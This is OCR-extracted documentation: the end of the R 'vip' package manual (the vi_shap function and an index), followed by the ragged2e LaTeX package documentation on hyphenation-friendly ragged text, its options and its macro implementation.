Compute SHAP-based VI scores for the predictors in a model. See details below.
**Usage**
vi_shap(object, ...)
## Default S3 method:
vi_shap(object, feature_names = NULL, train = NULL, ...)
Arguments
- **object**: A fitted model object (e.g., a "randomForest" object).
- **...**: Additional optional arguments to be passed on to `explain`.
- **feature_names**: Character string giving the names of the predictor variables (i.e., features) of interest. If NULL (the default) then the internal `get_feature_names()` function will be called to try and extract them automatically. It is good practice to always specify this argument.
- **train**: A matrix-like R object (e.g., a data frame or matrix) containing the training data. If NULL (the default) then the internal `get_training_data()` function will be called to try and extract it automatically. It is good practice to always specify this argument.
Details
This approach to computing VI scores is based on the mean absolute value of the SHAP values for each feature; see, for example, [https://github.com/slundberg/shap](https://github.com/slundberg/shap) and the references therein.
Value
A tidy data frame (i.e., a "tibble" object) with two columns, `Variable` and `Importance`, containing the variable name and its associated importance score, respectively.
Index
add_sparklines, 2
aes, 11
aes_, 11
C5.0, 16
C5imp, 16
cforest, 16, 18
coef.glmnet, 16
create_progress_bar, 8, 21
ctree_control, 16
cubist, 16
earth, 17
evimp, 17
explain, 23
foreach, 8
formula, 4
garson, 18
gbm, 17, 18
gen_friedman, 3
geom_boxplot, 11
geom_col, 10
geom_point, 10
geom_violin, 11
get_formula, 4
glmnet, 15, 16
h2o.varimp, 17
H2OModel, 17
importance, 16, 18
layer, 11
list_metrics, 4, 20
lm, 18
metric_accuracy (metric_mse), 5
metric_auc (metric_mse), 5
metric_error (metric_mse), 5
metric_logLoss (metric_mse), 5
metric_mae (metric_mse), 5
metric_mauc (metric_mse), 5
metric_mse, 5
metric_rmse (metric_mse), 5
metric_rsquared (metric_mse), 5
metric_sse (metric_mse), 5
ml_feature_importances, 18
mlbench.friedman1, 3
nnet, 17
olden, 18
partial, 3, 8, 12
randomForest, 18
ranger, 18
rpart, 18
summary.cubist, 16
summary.earth, 17
summary.gbm, 17
train, 18
varImp, 18, 19
varimp, 16, 18
varImp.cubist, 16
varimpAUC, 18
vi, 6, 10
vi_firm, 6, 12, 19
vi_ice (vi_pdp), 19
vi_model, 6, 13
vi_pdp, 19
vi_permute, 6, 7, 11, 19
vi_shap, 6, 22
vint, 8
vip, 10
xgb.importance, 18
xgboost, 18
|
{"Source-Url": "https://cran.r-project.org/web/packages/vip/vip.pdf", "len_cl100k_base": 9869, "olmocr-version": "0.1.50", "pdf-total-pages": 24, "total-fallback-pages": 0, "total-input-tokens": 55174, "total-output-tokens": 11909, "length": "2e13", "weborganizer": {"__label__adult": 0.0003573894500732422, "__label__art_design": 0.0011205673217773438, "__label__crime_law": 0.00035071372985839844, "__label__education_jobs": 0.0026092529296875, "__label__entertainment": 0.0002837181091308594, "__label__fashion_beauty": 0.00021636486053466797, "__label__finance_business": 0.0004782676696777344, "__label__food_dining": 0.00037550926208496094, "__label__games": 0.00127410888671875, "__label__hardware": 0.0008835792541503906, "__label__health": 0.0003740787506103515, "__label__history": 0.0004439353942871094, "__label__home_hobbies": 0.0001952648162841797, "__label__industrial": 0.000545501708984375, "__label__literature": 0.000518798828125, "__label__politics": 0.00039887428283691406, "__label__religion": 0.0005211830139160156, "__label__science_tech": 0.11236572265625, "__label__social_life": 0.0002015829086303711, "__label__software": 0.08001708984375, "__label__software_dev": 0.79541015625, "__label__sports_fitness": 0.0003497600555419922, "__label__transportation": 0.00035119056701660156, "__label__travel": 0.000308990478515625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 41539, 0.02831]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 41539, 0.91104]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 41539, 0.77041]], "google_gemma-3-12b-it_contains_pii": [[0, 1730, false], [1730, 2578, null], [2578, 4099, null], [4099, 4789, null], [4789, 5687, null], [5687, 6705, null], [6705, 9304, null], [9304, 11322, null], [11322, 12828, null], [12828, 13930, null], [13930, 14967, null], [14967, 16286, null], [16286, 18027, null], [18027, 19160, null], [19160, 20619, null], [20619, 24686, null], [24686, 28585, null], [28585, 32198, null], [32198, 33050, null], [33050, 35319, null], [35319, 37635, null], [37635, 39133, null], [39133, 40437, null], [40437, 41539, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1730, true], [1730, 2578, null], [2578, 4099, null], [4099, 4789, null], [4789, 5687, null], [5687, 6705, null], [6705, 9304, null], [9304, 11322, null], [11322, 12828, null], [12828, 13930, null], [13930, 14967, null], [14967, 16286, null], [16286, 18027, null], [18027, 19160, null], [19160, 20619, null], [20619, 24686, null], [24686, 28585, null], [28585, 32198, null], [32198, 33050, null], [33050, 35319, null], [35319, 37635, null], [37635, 39133, null], [39133, 40437, null], [40437, 41539, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41539, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41539, null]], "pdf_page_numbers": [[0, 1730, 1], [1730, 2578, 2], [2578, 4099, 3], [4099, 4789, 4], [4789, 5687, 5], [5687, 6705, 6], [6705, 9304, 7], [9304, 11322, 8], [11322, 12828, 9], [12828, 13930, 10], [13930, 14967, 11], [14967, 16286, 12], [16286, 18027, 13], [18027, 19160, 14], [19160, 20619, 15], [20619, 24686, 16], [24686, 28585, 17], [28585, 32198, 18], [32198, 33050, 19], [33050, 35319, 20], [35319, 37635, 21], [37635, 39133, 22], [39133, 40437, 23], [40437, 41539, 24]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41539, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-29
|
2024-11-29
|
477c2e8f88bee985088166283364ad35ecfbddeb
|
The \texttt{ragged2e}-package\footnote{The version number of this file is v3.1, revision #(None), last revised (None).}
Martin Schröder
\url{https://gitlab.com/TExhackse/ragged2e}\footnote{maintained by Marei Peischl}
2021/12/15
Abstract
This package provides new commands and environments for setting ragged text which are easy to configure to allow hyphenation. An earlier attempt to do this was the style \texttt{raggedright} \cite{raggedright} by the same author.
Contents
1 The problem
2 Old “solutions”
\hspace{0.5cm} 2.1 \LaTeX
\hspace{1cm} 2.2 plain
3 Our solution
\hspace{0.5cm} 3.1 The macros
\hspace{1cm} 3.2 The parameters
\hspace{1cm} 3.3 The environments
4 Options
5 Required packages
6 The implementation
\hspace{0.5cm} 6.1 Initial Code
\hspace{1cm} 6.2 Declaration of options
\hspace{1.5cm} 6.2.1 originalcommands option
\hspace{1cm} 6.2.2 originalparameters option
\hspace{1cm} 6.2.3 raggedrightboxes option
\hspace{1cm} 6.2.4 footnotes option
\hspace{1cm} 6.2.5 document option
\hspace{1cm} 6.2.6 Other options
\hspace{1cm} 6.3 Executing options
\hspace{1cm} 6.4 Loading packages
\hspace{1cm} 6.5 Allocations
1 THE PROBLEM
1.1 The problem
LaTeX has three commands (\centering, \raggedleft, and \raggedright) and three environments (center, flushleft, and flushright) to typeset ragged text. The environments are based upon the commands (center uses \centering, flushleft \raggedright, and flushright \raggedleft).
These commands have, however, one serious flaw: they render hyphenation almost impossible, and thus the text looks too ragged, as the following example shows:
\raggedright:
"The LaTeX document preparation system is a special version of Donald Knuth’s \TeX program. \TeX is a sophisticated program designed to produce high-quality typesetting, especially for mathematical text." [5, p. xiii]
\raggedleft:
"The \TeX document preparation system is a special version of Donald Knuth’s \TeX program. \TeX is a sophisticated program designed to produce high-quality typesetting, especially for mathematical text." [5, p. xiii]
2 Old “solutions”
2.1 \LaTeX
\LaTeX defines e. g. \raggedright as follows:
1 (\latex)
2 \DeclareRobustCommand
3 \raggedright\
4 \let\@centercr\
5 \flushglue
6 \rightskip\flushglue
7 \finalhyphendemerits=\z@\
8 \leftskip\z@skip
9 \parindent\z@}
Initially, \flushglue is defined as 10 \flushglue = Opt plus 1fil
11 (/latex)
Thus the \rightskip is set to Opt plus 1fil. Knuth, however warns [4, p. 101]:
“For example, a person can set \rightskip=Opt plus 1fil, and every line will be filled with space to the right. But this isn’t a particularly good way to make ragged-right margins, because the infinite stretchability will assign zero badness to lines that are very short. To do a decent job of ragged-right setting, the trick is to set \rightskip so that it will stretch enough to make line breaks possible, yet not too much, because short lines should be considered bad. Furthermore the spaces between words should be fixed so that they do not stretch or shrink.”
2.2 \texttt{plain}
\texttt{plain} \TeX defines an special version of \texttt{\raggedright}, which
3 OUR SOLUTION
Our solution operates the way Knuth describes it; but which can not be used with \LaTeX, because \LaTeX redefines \raggedright.
\begin{verbatim}
12 \def\raggedright{%
13 \rightskip\z@ plus2em
14 \spaceskip.3333em
15 \xspaceskip.5em\relax}
\end{verbatim}
\textit{plain} provides also a version of \raggedright for typewriter fonts
\begin{verbatim}
17 \def\ttraggedright{%
18 \tt
19 \rightskip\z@ plus2em\relax}
20 \texttt{/\plain}
\end{verbatim}
3 Our solution
Since the \textit{plain} solution can not be used with \LaTeX, we have to redefine it and make it possible to configure it for personal preferences.
3.1 The macros
\texttt{\Centering}, \texttt{\RaggedLeft}, and \texttt{\RaggedRight} can be used in the same way as \texttt{\centering}, \texttt{\raggedleft}, and \texttt{\raggedright}: Just type the command, and after that the whole text will be set centered, ragged-left or ragged-right.
For example, we switched on \texttt{\RaggedRight} on the top of this text, and consequently this text was set ragged-right.\textsuperscript{*}
\texttt{\justifying} switches back to justified text after ragged text has been switched on.
The new commands \texttt{\Centering}, \texttt{\RaggedLeft}, and \texttt{\RaggedRight} are fully compatible with their counterparts in \LaTeX, but implement the \textit{plain} solution and can be easily configured using the following parameters:
3.2 The parameters
\begin{tabular}{ll}
\hline
Command & Uses \\
\hline
\texttt{\Centering} & \texttt{\CenteringLeftskip}, \texttt{\CenteringRightskip}, \texttt{\CenteringParfillskip}, \texttt{\CenteringParindent} \\
\texttt{\RaggedLeft} & \texttt{\RaggedLeftLeftskip}, \texttt{\RaggedLeftRightskip}, \texttt{\RaggedLeftParfillskip}, \texttt{\RaggedLeftParindent} \\
\texttt{\RaggedRight} & \texttt{\RaggedRightLeftskip}, \texttt{\RaggedRightRightskip}, \texttt{\RaggedRightParfillskip}, \texttt{\RaggedRightParindent} \\
\texttt{\justifying} & \texttt{\justifyingParfillskip}, \texttt{\justifyingParindent} \\
\hline
\end{tabular}
All Parameters can be set with \texttt{\setlength}, e.g.
\begin{verbatim}
\setlength{\RaggedRightRightskip}{0pt plus 1em}
\end{verbatim}
\textsuperscript{*}For this documentation we also set \texttt{\RaggedRightRightskip} higher than usual (\texttt{0pt plus 2em} instead of \texttt{0pt plus 2em}) because of all the long command names which make linebreaking difficult.
sets \RaggedRightRightskip to $0pt \text{ plus } 1em$.
These are the \leftskip inserted by \Centering, \RaggedLeft, and \RaggedRight.
\textit{“leftskip (glue at left of justified lines)” [4, p. 274]}
\leftskip must be set to a finite value, to make hyphenation possible. Setting it to infinite values like $0pt \text{ plus } 1fil$ makes hyphenation almost impossible.
These are the \rightskip inserted by \Centering, \RaggedLeft, and \RaggedRight.
\textit{“rightskip (glue at right of justified lines)” [4, p. 274]}
\rightskip must be set to a finite value, to make hyphenation possible. Setting it to infinite values like $0pt \text{ plus } 1fil$ makes hyphenation almost impossible.
These are the \parfillskip inserted by \Centering, \RaggedLeft, \RaggedRight, and \justifying.
\textit{“parfillskip (additional \rightskip at end of paragraphs)” [4, p. 274]}
The normal setting for \parfillskip is $0pt \text{ plus } 1fil$; the parameters are provided for testing combinations of \{left\right\}skip and \parfillskip.
These are the \parindent used by \Centering, \RaggedLeft, \RaggedRight, and \justifying.
\textit{“parindent (width of indent)” [4, p. 274]}
\parindent is the indent of the first line of a paragraph and should be set to $0pt$, since indented lines in ragged text do not look good.
The parameters have the following initial setting:
3.3 The environments
Center Center is fully compatible with center, but uses \centering instead of centering.
FlushLeft FlushLeft is fully compatible with flushleft, but uses \raggedright instead of \raggedright.
FlushRight FlushRight is fully compatible with flushright, but uses \raggedleft instead of \raggedleft.
justify justify is like the other environments but uses \justifying.
E. g. FlushLeft can be used in the same way as flushleft:
\begin{FlushLeft}
⟨text, which is set ragged-right⟩
\end{FlushLeft}
4 Options
This package has the following options:
originalcommands The \LaTeX-commands \centering, \raggedleft, and \raggedright and the \LaTeX-environments center, flushleft, and flushright remain unchanged.
It is the default.
\footnote{†For proportional and monospaced fonts.}
newcommands The \LaTeX-commands \texttt{\centering}, \texttt{\raggedleft}, and \texttt{\raggedright} and the \LaTeX-environments \texttt{center}, \texttt{flushleft}, and \texttt{flushright} are set equal to their counterparts defined by \texttt{ragged2e}. Thus \texttt{\raggedright} invokes \texttt{\RaggedRight}. The original commands can be accessed under the Names \texttt{\LaTeX\langle\text{original name}\rangle}, e. g. \texttt{\LaTeX\raggedright}.
originalparameters The parameters used by the commands implemented by \texttt{ragged2e} are initialized with the default settings used by \LaTeX.
newparameters The parameters used by the commands implemented by \texttt{ragged2e} are initialized with the default settings defined by \texttt{ragged2e}. It is the default.
raggedrightboxes All \texttt{\parbox}s, \texttt{\minipage}s, \texttt{\marginpar}s and \texttt{p}-columns of \texttt{tabular}s and \texttt{array}s are automatically set using \texttt{\RaggedRight}.
footnotes This options sets all footnotes ragged-right by loading the \texttt{footmisc}[2] package with the \texttt{ragged} option.
document This options sets the complete document ragged-right by executing a \texttt{\RaggedRight} at \texttt{\begin{document}} and the \texttt{raggedrightboxes} and the \texttt{footnotes} options.
All other options are passed to the \texttt{footmisc} package if the \texttt{footnotes} option is selected.
5 Required packages
This package requires the following packages:
everyset[8] (only if format older than 2021/01/05) It has been used to distinguish between monospaced and proportional fonts as long as the \LaTeX kernel did not provide the functionality with \texttt{lthooks}[6]. Formats newer than 2021/01/05 do no longer depend on \texttt{everyset}.
footmisc[2] It is used by the \texttt{footnotes} and the \texttt{document} options; at least version 5.00 (2002/08/28) is needed.
6 The implementation
6.1 Initial Code
\if@raggedtwoe@originalcommands is used to flag the use of the \texttt{originalcommands} or \texttt{newcommands} option.
6 THE IMPLEMENTATION
\ifraggedtwoeoriginalparameters
\ifraggedtwoeoriginalparameters is used to flag the use of the originalparameters or newparameters option.
23 \newif\ifraggedtwoeoriginalparameters
\ifraggedtwoefootmisc
\ifraggedtwoefootmisc is used to flag the use of the footnotes option.
24 \newif\ifraggedtwoefootmisc
6.2 Declaration of options
6.2.1 originalcommands option
The originalcommands and newcommands options control the meaning of the \LaTeX-commands for ragged text: If newcommands is used the \LaTeX-commands are set equal to the commands defined by \raggedtwoe.
25 \DeclareOption{OriginalCommands}{\@raggedtwoeoriginalcommandstrue}
26 \DeclareOption{originalcommands}{\@raggedtwoeoriginalcommandstrue}
27 \DeclareOption{NewCommands}{\@raggedtwoeoriginalcommandstruefalse}
28 \DeclareOption{newcommands}{\@raggedtwoeoriginalcommandstruefalse}
6.2.2 originalparameters option
The originalparameters and newparameters options control the defaults for the parameters used by the commands implemented by \raggedtwoe: If newparameters is used the parameters are set to the values defined by \raggedtwoe.
29 \DeclareOption{OriginalParameters}{\@raggedtwoeoriginalparameterstrue}
30 \DeclareOption{originalparameters}{\@raggedtwoeoriginalparameterstrue}
31 \DeclareOption{NewParameters}{\@raggedtwoeoriginalparameterstruefalse}
32 \DeclareOption{newparameters}{\@raggedtwoeoriginalparameterstruefalse}
6.2.3 raggedrightboxes option
The option raggedrightboxes sets all \parboxes, minipages, \marginpars and p-columns of tabulars and arrays using \RaggedRight. This is done by redefining \arrayparboxrestore.
\raggedtwo@raggedrightboxes@opt
\raggedtwo@raggedrightboxes@opt is the code executed via \DeclareOption.
33 \newcommand*{\@raggedtwo@raggedrightboxes@opt}{}
First we check if \arrayparboxrestore is unchanged.
34 \CheckCommand*{\@arrayparboxrestore}{}
35 \let\if\nobreak\iffalse
36 \let\if\noskipsec\iffalse
37 \let\par\@@par
38 \let\-\@dischyph
39 \let\'\@acci\let\"\@accii\let\\@acciii
Then we redefine it by removing the setting of `\leftskip`, `\rightskip`, \@rightskip and `\parfillskip` and instead calling `\RaggedRight`.
Now we self-destroy so the command can be called more than once without causing harm (and it also frees up some space).
Finally the declaration of the option.
6.2.4 `footnotes` option
The option `footnotes` just sets a flag (`\if@raggedtwoe@footmisc`) to load the `footmisc` package and passes the option `ragged` to it.
6.2.5 `document` option
The option `document` sets the complete document ragged-right by executing `\RaggedRight` via `\AtBeginDocument` and also executing the `raggedrightboxes` option.
\@raggedtwoe@abdhook is the code executed via \AtBeginDocument: Give a message on the terminal, execute \RaggedRight and self-destroy. We also make \@tocrmarg flexible; otherwise long lines in the table of contents (and similar tables) would not be broken because the spaceskip is rigid.
\newcommand{\@raggedtwoe@abdhook}{\PackageInfo{ragged2e}{ABD: executing \string\RaggedRight}}\RaggedRight\@ifundefined{@tocrmarg}{}{\edef\@tocrmarg{\@tocrmarg plus 2em}}\let\@raggedtwoe@abdhook\relax
Finally the declaration of the option.
\DeclareOption{document}{\@raggedtwoe@document@opt}
6.2.6 Other options
All unused options are passed to the footmisc package if the footnotes option is selected; otherwise the usual error is raised.
\DeclareOption*{\if\@raggedtwoe@footmisc\PassOptionsToPackage{\CurrentOption}{footmisc}\else\OptionNotUsed\fi}
6.3 Executing options
The default options are originalcommands and newparameters.
\ExecuteOptions{originalcommands,newparameters}\ProcessOptions\relax
6.4 Loading packages
We need the everyssel package for older kernels.
If the option footnotes is selected, we load the footmisc package after we are finished (footmisc detects our presence by looking for the definition of \RaggedRight, so we can not load it just now).
6.5 Allocations
First we allocate the parameters
\newlength{CenteringLeftskip}
\newlength{RaggedLeftLeftskip}
\newlength{RaggedRightLeftskip}
\newlength{CenteringRightskip}
\newlength{RaggedLeftRightskip}
\newlength{RaggedRightRightskip}
\newlength{CenteringParfillskip}
\newlength{RaggedLeftParfillskip}
\newlength{RaggedRightParfillskip}
\newlength{JustifyingParfillskip}
\newlength{CenteringParindent}
\newlength{RaggedLeftParindent}
\newlength{RaggedRightParindent}
\newlength{JustifyingParindent}
6.6 Initializations
Depending on \if@raggedtwoe@originalparameters we initialize the parameters with the values \LaTeX{} uses for its own commands or with our new parameters.
\if@raggedtwoe@originalparameters
\CenteringLeftskip\@flushglue
\RaggedLeftLeftskip\@flushglue
\RaggedRightLeftskip\z@skip
\CenteringRightskip\@flushglue
\RaggedLeftRightskip\z@skip
\RaggedRightRightskip\@flushglue
\CenteringParfillskip\z@skip
\RaggedLeftParfillskip\z@skip
\RaggedRightParfillskip\@flushglue
\CenteringParindent\z@
\RaggedLeftParindent\z@
\RaggedRightParindent\z@
\else
\CenteringLeftskip\z@\@plus\tw@ em
\RaggedLeftLeftskip\z@\@plus\tw@ em
\RaggedRightLeftskip\z@skip
\CenteringRightskip\z@\@plus\tw@ em
\RaggedLeftRightskip\z@skip
\RaggedRightRightskip\z@\@plus\tw@ em
\fi
6.7 Distinguishing between monospaced and proportional fonts
To set ragged text with proportional fonts and monospaced fonts correctly, we must distinguish between these two kinds of fonts \textit{everytime} a font is loaded. Otherwise the settings for e.g. a proportional fonts would be in effect if you start \texttt{RaggedRight} in \texttt{rmfamily} and then switch to \texttt{ttfamily}.
The goal is to have a rigid interword space in all fonts. TeX’s interword space is \texttt{\fontdimen2 plus \fontdimen3 minus \fontdimen4}. This can be overwritten by setting \texttt{\spaceskip} (space between words, if nonzero) and \texttt{\xspaceskip} (space at the end of sentences, if nonzero).
We do the setting with the help of \texttt{everyset[8]}, which allows us to define code which is (hopefully) executed after every fontchange in a LaTeX document.‡
\begin{verbatim}
\if@raggedtwoe@spaceskip
\if@raggedtwoe@spaceskip signals the use of commands defined by \ragged2e to the command inserted into \texttt{\selectfont}. It is set to true by these commands and restored to false by TeX when the scope of them ends.
\newif\if@raggedtwoe@spaceskip
\@raggedtwoe@everyselectfont\texttt{\@raggedtwoe@everyselectfont} is our code inserted into \texttt{\selectfont}.
\newcommand{\@raggedtwoe@everyselectfont}{%}
\if@raggedtwoe@spaceskip
If no command defined by \ragged2e is in use, we do nothing. But if it is, we look at \texttt{\fontdimen3} to see if the current font is monospaced or not.
\ifdim\fontdimen3\font=\z@\relax
If it is, we set \texttt{\spaceskip} to \texttt{0pt} so the interword space will be the one specified by the font designer – which is rigid anyway for monospaced fonts.
\else
\fi
\fi
\fi
\end{verbatim}
‡It is executed after every \texttt{\selectfont}, so if you stay within NFSS and don’t declare your fonts with commands like \texttt{\newfont} and then switch to them, it will work.
For proportional fonts we make the interword space rigid by setting \spaceskip to \fontdimen2. \fi
We have to reset the interword space if we are not active. \else \spaceskip\z@ \fi\}
If our kernel is new enough we use the kernel hook directly instead of the \everyisel macro. IfFormatAtLeastTF{2021/01/05}{\AddToHook{selectfont}{\@raggedtwoe@everyselectfont}}\EverySelectfont{\@raggedtwoe@everyselectfont}
\ref{6.8 The commands}
\@raggedtwoe@savedcr We save the definition of \ in \@raggedtwoe@savedcr. \let\@raggedtwoe@savedcr\}
\@raggedtwoe@saved@gnewline We save the definition of \@gnewline in \@raggedtwoe@saved@gnewline. \let\@raggedtwoe@saved@gnewline\@gnewline The following definition of a \@gnewline used by the ragged commands was suggested by Markus Kohm:
\newcommand*{\@raggedtwoe@gnewline}[1]{\ifvmode\@nolnerr\else\unskip\ifmmode\reserved@e{\reserved@f #1}\nobreak \hfil \break\else\reserved@e{\reserved@f #1}{\parskip\z@\par}\fi\fi\} \Centering \Centering first lets \ = \@centercr, but only if \ has its original meaning, otherwise \Center would not work inside environments like \texttt{tabular} etc., in which \ has a different meaning. It also sets \@gnewline to \@raggedtwoe@gnewline. Then, the \LaTeX\ and \TeX-parameters are set. \@rightskip is \LaTeX's version of \rightskip.
“Every environment, like the list environments, that set \rightskip to its ‘normal’ value set it to \@rightskip" [1]
Finally we signal the code inserted into \selectfont that we are active and call that code directly.
\begin{verbatim}
\DeclareRobustCommand{\Centering}{%
\ifx\ \@raggedtwoe@savedcr
\let\ \@centercr
\fi
\let\@gnewline\@raggedtwoe@gnewline
\leftskip\CenteringLeftskip
\@rightskip\CenteringRightskip
\rightskip\@rightskip
\parfillskip\CenteringParfillskip
\parindent\CenteringParindent
\@raggedtwoe@spaceskiptrue
\@raggedtwoe@everyselectfont
\}
\RaggedLeft
\RaggedLeft is like \Centering; it only uses other parameters.
\DeclareRobustCommand{\RaggedLeft}{%
\ifx\ \@raggedtwoe@savedcr
\let\ \@centercr
\fi
\let\@gnewline\@raggedtwoe@gnewline
\leftskip\RaggedLeftLeftskip
\@rightskip\RaggedLeftRightskip
\rightskip\@rightskip
\parfillskip\RaggedLeftParfillskip
\parindent\RaggedLeftParindent
\@raggedtwoe@spaceskiptrue
\@raggedtwoe@everyselectfont
\}
\RaggedRight
\RaggedRight is like \Centering; it only uses other parameters.
\DeclareRobustCommand{\RaggedRight}{%
\ifx\ \@raggedtwoe@savedcr
\let\ \@centercr
\fi
\let\@gnewline\@raggedtwoe@gnewline
\leftskip\RaggedRightLeftskip
\@rightskip\RaggedRightRightskip
\rightskip\@rightskip
\parfillskip\RaggedRightParfillskip
\parindent\RaggedRightParindent
\@raggedtwoe@spaceskiptrue
\@raggedtwoe@everyselectfont
\}
\justifying
\justifying switches back to the defaults used by \LaTeX\ for typesetting justified text.
\end{verbatim}
6.9 The environments
The environments Center, FlushLeft, and \FlushRight are implemented like their counterparts in \LaTeX: Start a trivlist and switch on the right command.
\begin{verbatim}
\newenvironment{Center}{%
\trivlist
\Centering\item\relax
}\endtrivlist
\newenvironment{FlushLeft}{%
\trivlist
\RaggedRight\item\relax
}\endtrivlist
\newenvironment{FlushRight}{%
\trivlist
\RaggedLeft\item\relax
}\endtrivlist
\end{verbatim}
\begin{verbatim}
\newenvironment{justify}{%
\trivlist
\justifying\item\relax
}\endtrivlist
\end{verbatim}
justify is similar to the other environments: Start a trivlist and use \justifying.
\begin{verbatim}
\newenvironment{justify}{%
\trivlist
\justifying\item\relax
}\endtrivlist
\end{verbatim}
6.10 Overloading the \LaTeX-commands
If the option newcommands is used, we save the original \LaTeX-commands and environments for ragged text and overload them.
\begin{verbatim}
\if@raggedtwoe@originalcommands
\end{verbatim}
7 Acknowledgements
A first version of this package for \LaTeX2.09 was named raggedri [9]. Laurent Siebenmann (lcs@topo.math.u-psud.fr) with his style ragged.sty [10] provided the final impulse for this new implementation.
The code for justifying, justify and the overloading of \@arrayparboxrestore is incorporated from the raggedr [3] package by James Kilfinger (mapdn@csv.warwick.ac.uk).
Without the constant nagging of Rainer Sieger (rsieger@awi-bremerhaven.de) this package might not be.
Markus Kohm (markus.kohm@gmx.de) provided the code for \@gnewline.
Frank Mittelbach (frank.mittelbach@latex-project.org) provided the impetus for version 2.00.
Rolf Niepraschk (Rolf.Niepraschk@gmx.de) and Hubert Gäßlein found many bugs and provided fixes for them and code for new features.
Jordan Firth (jafirth@ncsu.edu) provided the final push for version 2.2.
References
(2) Robin Fairbairns. *footmisc* — a portmanteau package for customising footnotes in \LaTeX. \url{https://mirror.ctan.org/macros/latex/contrib/footmisc/}.
(3) James Kilfiger. \url{https://ctan.org/tex-archive/obsolete/macros/latex/contrib/raggedr.sty}. \LaTeX\ package.
(6) Frank Mittelbach. The \texttt{lthooks} package. \url{http://mirrors.ctan.org/macros/latex/base/lthooks-doc.pdf}
(7) Frank Mittelbach and Rainer Schöpf. The file \texttt{cmfonts.fdd} for use with \LaTeX. Part of the \LaTeX-distribution.
(8) Martin Schröder. The obsolete \texttt{everysel}-package. \url{http://mirrors.ctan.org/macros/latex/contrib/everysel/everysel.pdf}. \LaTeX\ package.
(9) Martin Schröder. The \texttt{raggedri} document option. Was in \url{http://mirrors.ctan.org/tex-archive/macros/latex209/contrib/raggedright}. \LaTeX2.09 style, outdated.
(10) Laurent Siebenmann. \texttt{ragged.sty}. \texttt{CTAN:tex-archive/macros/generic/ragged.sty}. generic macro file for \texttt{plain} and \texttt{\LaTeX}.
**Index**
Numbers written in italic refer to the page where the corresponding entry is described; numbers underlined refer to the code line of the definition; numbers in roman refer to the code lines where the entry is used.
<table>
<thead>
<tr>
<th>Symbols</th>
<th>Code Lines</th>
</tr>
</thead>
<tbody>
<tr>
<td>\verb</td>
<td>^</td>
</tr>
<tr>
<td>\verb</td>
<td>--</td>
</tr>
<tr>
<td>\verb</td>
<td>=</td>
</tr>
<tr>
<td>\verb</td>
<td>@par</td>
</tr>
<tr>
<td>\verb</td>
<td>@acci</td>
</tr>
<tr>
<td>\verb</td>
<td>@accii</td>
</tr>
<tr>
<td>\verb</td>
<td>@acciii</td>
</tr>
<tr>
<td>\verb</td>
<td>@arrayparboxrestore</td>
</tr>
<tr>
<td>\verb</td>
<td>@centercr</td>
</tr>
<tr>
<td>\verb</td>
<td>@dischyph</td>
</tr>
<tr>
<td>\verb</td>
<td>@flushglue</td>
</tr>
<tr>
<td>\verb</td>
<td>@nevaline</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
<tr>
<td>\verb</td>
<td>@ifundefined</td>
</tr>
</tbody>
</table>
Index
J
\justify (environment) .......... 5, 239
\justifying ............. 3, 210, 241
\JustifyingParfillskip ............. 4, 99, 140, 216
\JustifyingParindent 4, 99, 141, 217
L
\LaTeXcenter ............ 253
\LaTeXcentering ........... 247
\LaTeXflushleft ........... 255
\LaTeXflushright ......... 257
\LaTeXraggedleft .......... 248
\LaTeXraggedright ........ 249
\leftskip ............. 8, 44, 178, 189, 202, 213
\let .................. 4, 35, 36, 37, 38, 39, 51, 52, 53, 54, 55, 65, 76, 82, 157, 158, 173, 175, 186, 188, 199, 201, 211, 212, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264
\lineskip ................ 46, 61
\lineskiplimit ............. 47, 63
\linewidth ............ 42, 58
N
\newcommand .......... 33, 72, 78, 143, 159
\newenvironment .... 221, 227, 233, 239
\newif .................. 22, 23, 24, 142
\newlength ............ 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112
\nobreak ............ 165
\normalbaselineskip .... 48, 62
\normalineskip ......... 46, 61
\normalineskiplimit .... 47, 63
O
\OptionNotUsed ............ 89
P
\PackageInfo ............. 73
\par ............. 37, 53, 167
\parfillskip ....... 45, 179, 192, 205, 216
\parindent .............. 9, 40, 141, 180, 193, 206, 217
\parskip ................ 40, 56, 167
\PassOptionsToPackage .... 70, 87
\ProcessOptions .......... 93
\providecommand .......... 94
R
\RaggedLeft ............ 3, 184, 235, 251
\raggedleft ............ 248, 251
\RaggedLeftLeftskip ............. 4, 99, 115, 128, 189
